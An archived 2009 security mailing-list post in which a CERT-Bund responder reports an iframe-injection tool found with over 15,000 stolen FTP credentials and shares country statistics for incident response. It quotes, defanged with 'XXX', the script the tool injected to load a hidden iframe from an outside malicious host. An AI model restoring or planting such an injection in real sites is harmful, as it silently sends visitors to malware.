[nsp-sec] Compromised ftp accounts
Thomas Hungenberg
th.lab at hungenberg.net
Tue Aug 25 06:52:02 EDT 2009
The gzip'ed attachment did not make it to the list, so I'm sending the list
again uncompressed.
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
Thomas Hungenberg schrieb:
> Hi teams,
>
> I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
>
> The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
> <scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
>
> Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
> Format: ASN | IP | CC | ftp username | AS name
>
> Top 10 country codes:
>
> 5240 US
> 1263 RU
> 1187 DE
> 882 EU
> 803 TR
> 720 CZ
> 674 FR
> 655 PL
> 564 HU
> 475 NL
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ftp_asn.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090825/645c4591/attachment-0001.txt>
More information about the nsp-security
mailing list